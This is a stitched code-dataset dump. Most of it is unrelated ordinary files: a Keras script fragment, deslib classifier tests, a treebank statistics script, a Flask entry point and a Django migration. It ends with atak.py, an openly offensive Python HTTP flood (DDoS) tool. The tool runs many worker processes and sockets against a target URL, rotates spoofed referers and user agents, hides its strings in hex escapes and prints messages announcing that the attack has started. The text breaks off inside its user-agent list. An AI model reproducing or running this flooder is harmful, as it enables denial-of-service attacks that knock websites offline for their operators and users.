model.fit(X, Y, epochs=150, batch_size=10)
# evaluate the model
scores = model.evaluate(X, Y)
print("\n%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))
# calculate predictions
predictions = model.predict(X)
# round predictions
rounded = [round(x[0]) for x in predictions]
print(rounded)
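# Hedged extension sketch (not part of the original script): predicting for a
# single new record with the same 8 input features (the feature values below
# are made up for illustration):
#
#   new_record = numpy.array([[6, 148, 72, 35, 0, 33.6, 0.627, 50]])
#   print(model.predict(new_record))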
| 23.468085
| 85
| 0.708069
|
90ef1f7b80198de847ff458ae8af12366f12c532
| 41
|
py
|
Python
|
utils/mappings/__init__.py
|
SoulSen/CTSearcher
|
23f7fdef97f51e3f4592b92a2d3b1c365c0f547d
|
[
"MIT"
] | null | null | null |
utils/mappings/__init__.py
|
SoulSen/CTSearcher
|
23f7fdef97f51e3f4592b92a2d3b1c365c0f547d
|
[
"MIT"
] | null | null | null |
utils/mappings/__init__.py
|
SoulSen/CTSearcher
|
23f7fdef97f51e3f4592b92a2d3b1c365c0f547d
|
[
"MIT"
] | null | null | null |
from .MappingViewer import MappingViewer
| 20.5
| 40
| 0.878049
|
f39c53e1265eb41535b088b1d9958c37721b1521
| 5,089
|
py
|
Python
|
deslib/tests/dcs/test_mcb.py
|
Autumnn/DESlib
|
1dd461e6ac2bf55760751fa4e158a4113344b278
|
[
"BSD-3-Clause"
] | null | null | null |
deslib/tests/dcs/test_mcb.py
|
Autumnn/DESlib
|
1dd461e6ac2bf55760751fa4e158a4113344b278
|
[
"BSD-3-Clause"
] | null | null | null |
deslib/tests/dcs/test_mcb.py
|
Autumnn/DESlib
|
1dd461e6ac2bf55760751fa4e158a4113344b278
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from sklearn.linear_model import Perceptron
from deslib.dcs.mcb import MCB
from deslib.tests.examples_test import *
# ex1 the similarity will always be 100%
bks_dsel_ex1 = np.hstack((np.hstack((np.zeros((15, 1)), np.ones((15, 1)))), np.zeros((15, 1))))
# Change a bit to check if the filtering by similarity is working as intended.
bks_dsel_ex2 = np.hstack((np.hstack((np.zeros((15, 1)), np.ones((15, 1)))), np.zeros((15, 1))))
bks_dsel_ex2[1, :] = 2
bks_dsel_ex3 = bks_dsel_ex1 + 1
@pytest.mark.parametrize('similarity_threshold', [2.0, -1.0, -0.5])
def test_similarity_threshold(similarity_threshold):
with pytest.raises(ValueError):
MCB(create_pool_classifiers(), similarity_threshold=similarity_threshold)
@pytest.mark.parametrize('similarity_threshold', [None, 'a'])
def test_similarity_threshold_type(similarity_threshold):
with pytest.raises(TypeError):
MCB(create_pool_classifiers(), similarity_threshold=similarity_threshold)
@pytest.mark.parametrize('index, expected', [(0, [0.57142857, 0.71428571, 0.71428571]),
(1, [0.71428571, 0.85714286, 0.71428571]),
(2, [0.57142857, 0.71428571, 0.57142857])])
def test_estimate_competence(index, expected):
query = np.atleast_2d([1, 1])
mcb_test = MCB(create_pool_classifiers())
mcb_test.processed_dsel = dsel_processed_ex1
mcb_test.neighbors = neighbors_ex1[index, :]
mcb_test.distances = distances_ex1[index, :]
mcb_test.DFP_mask = [1, 1, 1]
mcb_test.BKS_dsel = bks_dsel_ex1
predictions = []
for clf in mcb_test.pool_classifiers:
predictions.append(clf.predict(query)[0])
competences = mcb_test.estimate_competence(query, predictions=np.atleast_2d(predictions))
assert np.isclose(competences, expected).all()
# This second test case uses a different BKS matrix to filter out some neighbors.
@pytest.mark.parametrize('index, expected', [(0, [0.66666666, 0.83333333, 0.66666666]),
(1, [0.83333333, 1.0, 0.66666666])])
def test_estimate_competence2(index, expected):
query = np.atleast_2d([1, 1])
mcb_test = MCB(create_pool_classifiers())
mcb_test.processed_dsel = dsel_processed_ex1
mcb_test.neighbors = neighbors_ex1[index, :]
mcb_test.distances = distances_ex1[index, :]
mcb_test.DFP_mask = [1, 1, 1]
# Only changing the pre-processed BKS to see if the filter works.
mcb_test.BKS_dsel = bks_dsel_ex2
predictions = []
for clf in mcb_test.pool_classifiers:
predictions.append(clf.predict(query)[0])
competences = mcb_test.estimate_competence(query, predictions=np.atleast_2d(predictions))
assert np.isclose(competences, expected).all()
# This third test uses a totally wrong BKS matrix, so that the technique is forced
# to use the whole region of competence.
@pytest.mark.parametrize('index, expected', [(0, [0.57142857, 0.71428571, 0.71428571]),
(1, [0.71428571, 0.85714286, 0.71428571]),
(2, [0.57142857, 0.71428571, 0.57142857])])
def test_estimate_competence3(index, expected):
query = np.atleast_2d([1, 1])
mcb_test = MCB(create_pool_classifiers())
mcb_test.processed_dsel = dsel_processed_ex1
mcb_test.neighbors = neighbors_ex1[index, :]
mcb_test.distances = distances_ex1[index, :]
mcb_test.DFP_mask = [1, 1, 1]
# Only changing the pre-processed BKS to see if the filter works.
mcb_test.BKS_dsel = bks_dsel_ex3
predictions = []
for clf in mcb_test.pool_classifiers:
predictions.append(clf.predict(query)[0])
competences = mcb_test.estimate_competence(query, predictions=np.atleast_2d(predictions))
assert np.isclose(competences, expected).all()
def test_estimate_competence_batch():
query = np.ones((3, 2))
expected = np.array([[0.57142857, 0.71428571, 0.71428571],
[0.71428571, 0.85714286, 0.71428571],
[0.57142857, 0.71428571, 0.57142857]])
mcb_test = MCB(create_pool_classifiers())
mcb_test.processed_dsel = dsel_processed_ex1
mcb_test.neighbors = neighbors_ex1
mcb_test.distances = distances_ex1
mcb_test.DFP_mask = np.ones((3, 3))
# Only changing the pre-processed BKS to see if the filter works.
mcb_test.BKS_dsel = bks_dsel_ex3
predictions = []
for clf in mcb_test.pool_classifiers:
predictions.append(clf.predict(query)[0])
competences = mcb_test.estimate_competence(query, predictions=np.tile(predictions, (3, 1)))
assert np.isclose(competences, expected).all()
# Test whether the class raises an error when the base classifiers do not implement the predict_proba method.
# In this case the test should not raise an error, since this class does not require base classifiers that
# can estimate probabilities.
def test_predict_proba():
X = X_dsel_ex1
y = y_dsel_ex1
clf1 = Perceptron()
clf1.fit(X, y)
MCB([clf1, clf1])
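# Hedged note (not part of the original test module): these tests are normally
# collected by pytest from the repository root, e.g.:
#
#   pytest deslib/tests/dcs/test_mcb.py -v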
| 40.712
| 109
| 0.683828
|
92019c04a196901100f4c287608f011b2e9edb8d
| 2,750
|
py
|
Python
|
bash/collect_stats_eud.py
|
coastalcph/HIT-SCIR-CoNLL2019
|
60258a81a2db91ca012be4486ea8475376756374
|
[
"Apache-2.0"
] | 5
|
2020-05-27T14:18:50.000Z
|
2021-05-28T05:07:19.000Z
|
bash/collect_stats_eud.py
|
coastalcph/HIT-SCIR-CoNLL2019
|
60258a81a2db91ca012be4486ea8475376756374
|
[
"Apache-2.0"
] | 1
|
2020-05-25T13:56:00.000Z
|
2020-05-25T13:56:00.000Z
|
bash/collect_stats_eud.py
|
coastalcph/HIT-SCIR-CoNLL2019
|
60258a81a2db91ca012be4486ea8475376756374
|
[
"Apache-2.0"
] | 1
|
2020-06-02T16:50:04.000Z
|
2020-06-02T16:50:04.000Z
|
import os,sys
# run:
#   python collect_stats_eud.py data_dir
# where data_dir contains the UD treebank directories (pass it with a trailing
# slash, since it is concatenated directly with the language directory names below)
eud_dir=sys.argv[1]
langs = os.listdir(eud_dir)
stats={}
bins = [(1,5),(5,10),(10,20), (20,50),(50,100),(100,500),(500,1000)]
bins_dict = {}
for abin in bins:
bins_dict[str(abin)] = list(range(abin[0],abin[1]))
bins_dict['1000+'] = []
for lang in langs:
if lang.endswith('PUD') or lang.endswith('FQB'):
continue
iso_cmd = f'ls {eud_dir}{lang}/*train.conllu'
iso = [line for line in os.popen(iso_cmd)][0].split("/")[6].split("-")[0]
stats[iso] = {'n_head':{},'labels':{}, 'label_freq':{}, 'binned_freq':{}}
for abin in bins_dict:
stats[iso]['binned_freq'][abin] = 0
trainfile = f'{eud_dir}{lang}/{iso}-ud-train.conllu'
with open(trainfile,'r') as tf:
for line in tf:
if line.startswith("#"):
continue
elif line == '\n':
continue
else:
eud = line.split('\t')[8]
all_heads = eud.split('|')
n_heads = len(all_heads)
if n_heads not in stats[iso]['n_head']:
stats[iso]['n_head'][n_heads] = 0
stats[iso]['n_head'][n_heads] += 1
for head in all_heads:
label = ''.join(head.partition(':')[2:])
if label not in stats[iso]['labels']:
stats[iso]['labels'][label] = 0
stats[iso]['labels'][label] +=1
for label in stats[iso]['labels']:
freq = stats[iso]['labels'][label]
if freq not in stats[iso]['label_freq']:
stats[iso]['label_freq'][freq] = 0
stats[iso]['label_freq'][freq] += 1
found_bin = False
for abin in bins_dict:
if freq in bins_dict[abin]:
stats[iso]['binned_freq'][abin] += 1
found_bin = True
if not found_bin:
stats[iso]['binned_freq']['1000+'] += 1
for iso in stats:
outfile = f'stats/{iso}.csv'
with open(outfile,'w') as out:
num_labels = len(stats[iso]['labels'])
out.write('labels \n')
line1 = f'number of labels\t{num_labels}\n'
out.write(line1)
out.write('binned label frequencies \n')
for abin, freq in stats[iso]['binned_freq'].items():
line = f'{abin}\t{freq}\n'
out.write(line)
max_heads = max(stats[iso]['n_head'])
out.write('\n heads \n')
line2 = f'max heads\t{max_heads}\n'
out.write(line2)
out.write('freq of head numbers \n')
for n_head, freq in sorted(stats[iso]['n_head'].items()):
line = f'{n_head}\t{freq}\n'
out.write(line)
| 35.714286
| 77
| 0.525091
|
ee4409881f109f2078c315f82a984364e2f71744
| 280
|
py
|
Python
|
src/main.py
|
JackEMiller/ClubForum
|
0ee68bb3aa453433f460257e07bfcf85f0f908de
|
[
"MIT"
] | null | null | null |
src/main.py
|
JackEMiller/ClubForum
|
0ee68bb3aa453433f460257e07bfcf85f0f908de
|
[
"MIT"
] | null | null | null |
src/main.py
|
JackEMiller/ClubForum
|
0ee68bb3aa453433f460257e07bfcf85f0f908de
|
[
"MIT"
] | null | null | null |
from models import create_app
try:
import views
except ImportError:
from src import views
app = create_app()
app.register_blueprint(views.app)
if __name__ == "__main__":
app = create_app()
app.register_blueprint(views.app)
app.run(host='0.0.0.0',port=5000,debug=True)
| 17.5
| 48
| 0.703571
|
d7ddeefe068337bfebf42642d4bfcd045ee1877d
| 1,409
|
py
|
Python
|
src/web/schools/migrations/0004_auto_20160508_1059.py
|
fossabot/SIStema
|
1427dda2082688a9482c117d0e24ad380fdc26a6
|
[
"MIT"
] | 5
|
2018-03-08T17:22:27.000Z
|
2018-03-11T14:20:53.000Z
|
src/web/schools/migrations/0004_auto_20160508_1059.py
|
fossabot/SIStema
|
1427dda2082688a9482c117d0e24ad380fdc26a6
|
[
"MIT"
] | 263
|
2018-03-08T18:05:12.000Z
|
2022-03-11T23:26:20.000Z
|
src/web/schools/migrations/0004_auto_20160508_1059.py
|
fossabot/SIStema
|
1427dda2082688a9482c117d0e24ad380fdc26a6
|
[
"MIT"
] | 6
|
2018-03-12T19:48:19.000Z
|
2022-01-14T04:58:52.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('schools', '0003_school_full_name'),
]
operations = [
migrations.CreateModel(
name='Parallel',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),
('short_name', models.CharField(max_length=100, help_text='Используется в урлах. Лучше обойтись латинскими буквами, цифрами и подчёркиванием. Например, cprime')),
('name', models.CharField(max_length=100, help_text="Например, C'")),
('school', models.ForeignKey(to='schools.School', on_delete=models.CASCADE)),
],
),
migrations.AlterField(
model_name='session',
name='short_name',
field=models.CharField(max_length=20, help_text='Используется в урлах. Лучше обойтись латинскими буквами, цифрами и подчёркиванием. Например, august'),
),
migrations.AddField(
model_name='parallel',
name='sessions',
field=models.ManyToManyField(to='schools.Session'),
),
migrations.AlterUniqueTogether(
name='parallel',
unique_together=set([('school', 'short_name')]),
),
]
| 37.078947
| 178
| 0.609652
|
eb81aadbfa75a952cb906b080db0d00248015c5f
| 4,317
|
py
|
Python
|
pychip/disassembler/disassembler.py
|
krskibin/pyChip8
|
517f4514fb49242acd8fb089c7de0ed62252d422
|
[
"MIT"
] | 3
|
2018-10-16T09:51:24.000Z
|
2020-08-02T14:33:35.000Z
|
pychip/disassembler/disassembler.py
|
krskibin/pyChip8
|
517f4514fb49242acd8fb089c7de0ed62252d422
|
[
"MIT"
] | null | null | null |
pychip/disassembler/disassembler.py
|
krskibin/pyChip8
|
517f4514fb49242acd8fb089c7de0ed62252d422
|
[
"MIT"
] | null | null | null |
from .opcode_table import OPCODE_TABLE
class Disassembler:
def __init__(self, memory):
self.memory: bytearray = memory
self.pc: int = 0x0
self.args_func_table: dict = {
0x0000: self.get_nnn_args,
0x00E0: self.get_no_args,
0x00EE: self.get_no_args,
0x1000: self.get_nnn_args,
0x2000: self.get_nnn_args,
0x3000: self.get_xkk_args,
            0x4000: self.get_xkk_args,  # 4xkk: SNE Vx, byte
            0x5000: self.get_xya_args,  # 5xy0: SE Vx, Vy
0x6000: self.get_xkk_args,
0x7000: self.get_xkk_args,
0x8000: self.get_xya_args,
0x8001: self.get_xya_args,
0x8002: self.get_xya_args,
0x8003: self.get_xya_args,
0x8004: self.get_xya_args,
0x8005: self.get_xya_args,
0x8006: self.get_xya_args,
0x8007: self.get_xya_args,
0x800E: self.get_xya_args,
0x9000: self.get_xya_args,
0xA000: self.get_i3n_args,
0xB000: self.get_nnn_args,
0xC000: self.get_xkk_args,
0xD000: self.get_xyn_args,
0xE09E: self.get_xaa_args,
0xE0A1: self.get_xaa_args,
0xF007: self.get_xa1_args,
0xF00A: self.get_xa2_args,
0xF015: self.get_xa3_args,
0xF018: self.get_xa4_args,
0xF01E: self.get_xa5_args,
0xF029: self.get_xa6_args,
0xF033: self.get_xa7_args,
0xF055: self.get_xa8_args,
0xF065: self.get_xa9_args
}
def get_opcode(self) -> int:
return self.memory[self.pc] << 8 | self.memory[self.pc + 1]
@staticmethod
def mask_opcode(opcode: int) -> int:
if (opcode & 0xF000) in [0x0000, 0xE000, 0xF000]:
opcode &= 0xF0FF
elif (opcode & 0xF000) in [0x8000]:
opcode &= 0xF00F
else:
opcode &= 0xF000
return opcode
@staticmethod
def lookup_opcode(opcode) -> str:
return OPCODE_TABLE.get(opcode, "????")
def find_args(self, opcode):
masked_opcode = Disassembler.mask_opcode(opcode)
return self.args_func_table.get(masked_opcode, self.__unhandled)(opcode)
def disassembly(self):
opcode = self.get_opcode()
args = self.find_args(opcode)
lookup_opcode = Disassembler.lookup_opcode(Disassembler.mask_opcode(opcode))
print(f'{hex(self.pc)}: {hex(opcode)[2:]}\t{lookup_opcode}\t{args}')
def __unhandled(self, *args):
return '????'
def get_nnn_args(self, opcode):
nnn = hex(opcode & 0xFFF)[2:]
return f' \t{nnn}'
def get_no_args(self, *args):
return ''
def get_xkk_args(self, opcode):
x = opcode >> 8 & 0x0f
kk = opcode & 0x00ff
return f'V{x:x}\t{hex(kk)}'
def get_xya_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
y = hex(opcode & 0x00f0)[2]
return f'V{x}, V{y}'
def get_i3n_args(self, opcode):
nnn = hex(opcode & 0xfff)[2:]
return f'I,\t{nnn}'
def get_xaa_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'V{x}'
def get_xyn_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
y = hex(opcode & 0x00f0)[2]
n = opcode & 0x000f
return f'V{x}, V{y} {n:x}'
def get_xa1_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'V{x}, DT'
def get_xa2_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'V{x}, K'
def get_xa3_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'DT, V{x}'
def get_xa4_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'ST, V{x}'
def get_xa5_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'I, V{x}'
def get_xa6_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'F, V{x}'
def get_xa7_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'B, V{x}'
def get_xa8_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'[I], V{x}'
def get_xa9_args(self, opcode):
x = hex(opcode & 0x0f00)[2]
return f'V{x}, [I]'
def get_unh_args(self, *args):
return f'unhandled'
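# Hedged usage sketch (not part of the original module). OPCODE_TABLE is defined
# in opcode_table.py, which is not shown here; the mnemonics in the comments are
# assumptions based on the standard Chip-8 instruction set.
#
#   rom = bytearray([0x00, 0xE0,    # 00E0 - CLS (clear the display)
#                    0xA2, 0x2A])   # A22A - LD I, 0x22a
#   dis = Disassembler(rom)
#   while dis.pc < len(dis.memory):
#       dis.disassembly()
#       dis.pc += 2  # every Chip-8 instruction is two bytes wide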
| 29.772414
| 84
| 0.560111
|
96fb82e8f8a5019f93643d2bbc8a45fef61cd199
| 21,869
|
py
|
Python
|
atak.py
|
F-Society-Freaks/atak-layer7
|
96d087e8bf75271fe2a9faae60d23ed9938c9c4f
|
[
"MIT"
] | 1
|
2020-07-12T12:57:10.000Z
|
2020-07-12T12:57:10.000Z
|
atak.py
|
AtakBey/atak-layer7
|
96d087e8bf75271fe2a9faae60d23ed9938c9c4f
|
[
"MIT"
] | null | null | null |
atak.py
|
AtakBey/atak-layer7
|
96d087e8bf75271fe2a9faae60d23ed9938c9c4f
|
[
"MIT"
] | 2
|
2020-07-08T20:23:18.000Z
|
2020-07-12T12:57:12.000Z
|
#!/usr/bin/env python
from multiprocessing import Process, Manager
import urlparse, ssl
import sys, getopt, random, time
if sys.version_info < (3,0):
import httplib
HTTPCLIENT = httplib
else:
import http.client
HTTPCLIENT = http.client
DEBUG = True
METHOD_GET = "\x67\x65\x74"
METHOD_POST = "\x70\x6F\x73\x74"
METHOD_RAND = "\x72\x61\x6E\x64\x6F\x6D"
JOIN_TIMEOUT=1.5
DEFAULT_WORKERS=55
DEFAULT_SOCKETS=35
class R00T(object):
counter = [0, 0]
last_counter = [0, 0]
workersQueue = []
manager = None
url = None
nr_workers = DEFAULT_WORKERS
nr_sockets = DEFAULT_SOCKETS
method = METHOD_RAND
def __init__(self, url):
self.url = url
self.manager = Manager()
self.counter = self.manager.list((0, 0))
def exit(self):
self.stats()
print "DOWN!!!"
def __del__(self):
self.exit()
def printHeader(self):
print "DDoS SaLdirisi BasLatiLdi.."
print "CoDeD By Atakbey"
def fire(self):
self.printHeader()
print "\x4D\x65\x74\x68\x6F\x64\x3A\x20\x7B0\x7D\x20\x2F\x20\x53\x61\x79\x69\x73\x69\x3A\x20\x7B\x31\x7D\x20\x2F\x20\x53\x6F\x63\x6B\x65\x64\x3A\x20\x7B\x32\x7D\x20".format(self.method, self.nr_workers, self.nr_sockets)
if DEBUG:
print "\x44\x65\x62\x75\x67\x20\x4D\x6F\x64\x65\x73\x20\x4F\x4E\x20\x4D\x65\x74\x68\x6F\x64\x3A\x20\x7B0\x7D\x20".format(self.nr_workers)
for i in range(int(self.nr_workers)):
try:
worker = Laser(self.url, self.nr_sockets, self.counter)
worker.method = self.method
self.workersQueue.append(worker)
worker.start()
except (Exception):
error("\x53\x61\x79\x69\x20\x42\x61\x73\x6C\x61\x74\x69\x6C\x61\x6D\x61\x64\x69\x20\x7B0\x7D".format(i))
pass
print "\x4D\x6F\x6E\x69\x74\x6F\x72\x20\x62\x61\x73\x6C\x61\x74\x69\x6C\x69\x79\x6F\x72"
self.monitor()
def stats(self):
try:
if self.counter[0] > 0 or self.counter[1] > 0:
print "\x59\x65\x64\x69\x67\x69\x20\x50\x61\x6B\x65\x74\x73\x3A\x20\x7B0\x7D\x20\x44\x44\x6F\x53\x65\x44\x20\x28\x7B\x31\x7D\x20\x47\x47\x29".format(self.counter[0], self.counter[1])
if self.counter[0] > 0 and self.counter[1] > 0 and self.last_counter[0] == self.counter[0] and self.counter[1] > self.last_counter[1]:
print "Server may be DOWN! By atak.pl"
self.last_counter[0] = self.counter[0]
self.last_counter[1] = self.counter[1]
except (Exception):
pass
def monitor(self):
while len(self.workersQueue) > 0:
try:
for worker in self.workersQueue:
if worker is not None and worker.is_alive():
worker.join(JOIN_TIMEOUT)
else:
self.workersQueue.remove(worker)
self.stats()
except (KeyboardInterrupt, SystemExit):
print "\x43\x54\x52\x4C\x2B\x43\x20\x72\x65\x63\x65\x69\x76\x65\x64\x2E\x20\x4B\x69\x6C\x6C\x69\x6E\x67\x20\x61\x6C\x6C\x20\x77\x6F\x72\x6B\x65\x72\x73"
for worker in self.workersQueue:
try:
if DEBUG:
print "\x4B\x69\x6C\x6C\x69\x6E\x67\x20\x77\x6F\x72\x6B\x65\x72\x20\x7B0\x7D".format(worker.name)
worker.stop()
except Exception, ex:
pass
if DEBUG:
raise
else:
pass
class Laser(Process):
request_count = 0
failed_count = 0
url = None
host = None
port = 80
ssl = False
referers = []
useragents = []
socks = []
counter = None
nr_socks = DEFAULT_SOCKETS
runnable = True
method = METHOD_GET
def __init__(self, url, nr_sockets, counter):
super(Laser, self).__init__()
self.counter = counter
self.nr_socks = nr_sockets
parsedUrl = urlparse.urlparse(url)
if parsedUrl.scheme == "\x68\x74\x74\x70\x73":
self.ssl = True
self.host = parsedUrl.netloc.split("\x3A")[0]
self.url = parsedUrl.path
self.port = parsedUrl.port
if not self.port:
self.port = 80 if not self.ssl else 443
self.referers = [
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x75\x73\x61\x74\x6F\x64\x61\x79\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x2F\x72\x65\x73\x75\x6C\x74\x73\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x65\x6E\x67\x61\x64\x67\x65\x74\x2E\x73\x65\x61\x72\x63\x68\x2E\x61\x6F\x6C\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x76\x6B\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x66\x69\x6C\x65\x2E\x70\x68\x70\x3F\x72\x65\x64\x69\x72\x65\x63\x74\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x79\x61\x6E\x64\x65\x78\x2E\x72\x75\x2F\x79\x61\x6E\x64\x73\x65\x61\x72\x63\x68\x3F\x74\x65\x78\x74\x3D",
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x75\x63\x6B\x64\x75\x63\x6B\x67\x6F\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x62\x69\x6E\x67\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x68\x65\x6C\x70\x2E\x62\x61\x69\x64\x75\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x52\x65\x73\x75\x6C\x74\x3F\x6B\x65\x79\x77\x6F\x72\x64\x73\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x73\x6B\x2E\x63\x6F\x6D\x2F\x77\x65\x62\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x65\x64\x64\x69\x74\x2E\x63\x6F\x6D\x2F\x73\x65\x61\x72\x63\x68\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2E\x74\x72\x2F\x3F\x71\x3D",
"\x68\x74\x74\x70\x3A\x2F\x2F" + self.host + "\x2F"
]
self.useragents = [
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x58\x31\x31\x3B\x20\x55\x3B\x20\x4C\x69\x6E\x75\x78\x20\x78\x38\x36\x5F\x36\x34\x3B\x20\x65\x6E\x2D\x55\x53\x3B\x20\x72\x76\x3A\x31\x2E\x39\x2E\x31\x2E\x33\x29\x20\x47\x65\x63\x6B\x6F\x2F\x32\x30\x30\x39\x30\x39\x31\x33\x20\x46\x69\x72\x65\x66\x6F\x78\x2F\x33\x2E\x35\x2E\x33",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x31\x3B\x20\x65\x6E\x3B\x20\x72\x76\x3A\x31\x2E\x39\x2E\x31\x2E\x33\x29\x20\x47\x65\x63\x6B\x6F\x2F\x32\x30\x30\x39\x30\x38\x32\x34\x20\x46\x69\x72\x65\x66\x6F\x78\x2F\x33\x2E\x35\x2E\x33\x20\x28\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x33\x2E\x35\x2E\x33\x30\x37\x32\x39\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x32\x3B\x20\x65\x6E\x2D\x55\x53\x3B\x20\x72\x76\x3A\x31\x2E\x39\x2E\x31\x2E\x33\x29\x20\x47\x65\x63\x6B\x6F\x2F\x32\x30\x30\x39\x30\x38\x32\x34\x20\x46\x69\x72\x65\x66\x6F\x78\x2F\x33\x2E\x35\x2E\x33\x20\x28\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x33\x2E\x35\x2E\x33\x30\x37\x32\x39\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x31\x3B\x20\x65\x6E\x2D\x55\x53\x3B\x20\x72\x76\x3A\x31\x2E\x39\x2E\x31\x2E\x31\x29\x20\x47\x65\x63\x6B\x6F\x2F\x32\x30\x30\x39\x30\x37\x31\x38\x20\x46\x69\x72\x65\x66\x6F\x78\x2F\x33\x2E\x35\x2E\x31",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x35\x2E\x30\x20\x28\x57\x69\x6E\x64\x6F\x77\x73\x3B\x20\x55\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x31\x3B\x20\x65\x6E\x2D\x55\x53\x29\x20\x41\x70\x70\x6C\x65\x57\x65\x62\x4B\x69\x74\x2F\x35\x33\x32\x2E\x31\x20\x28\x4B\x48\x54\x4D\x4C\x2C\x20\x6C\x69\x6B\x65\x20\x47\x65\x63\x6B\x6F\x29\x20\x43\x68\x72\x6F\x6D\x65\x2F\x34\x2E\x30\x2E\x32\x31\x39\x2E\x36\x20\x53\x61\x66\x61\x72\x69\x2F\x35\x33\x32\x2E\x31",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x31\x3B\x20\x57\x4F\x57\x36\x34\x3B\x20\x54\x72\x69\x64\x65\x6E\x74\x2F\x34\x2E\x30\x3B\x20\x53\x4C\x43\x43\x32\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x32\x2E\x30\x2E\x35\x30\x37\x32\x37\x3B\x20\x49\x6E\x66\x6F\x50\x61\x74\x68\x2E\x32\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x30\x3B\x20\x54\x72\x69\x64\x65\x6E\x74\x2F\x34\x2E\x30\x3B\x20\x53\x4C\x43\x43\x31\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x32\x2E\x30\x2E\x35\x30\x37\x32\x37\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x31\x2E\x31\x2E\x34\x33\x32\x32\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x33\x2E\x35\x2E\x33\x30\x37\x32\x39\x3B\x20\x2E\x4E\x45\x54\x20\x43\x4C\x52\x20\x33\x2E\x30\x2E\x33\x30\x37\x32\x39\x29",
"\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x38\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x35\x2E\x32\x3B\x20\x57\x69\x6E\x36\x34\x3B\x20\x78\x36\x34\x3B\x20\x54\x72\x69\x64\x65\x6E\x74\x2F\x34\x2E\x30\x29",
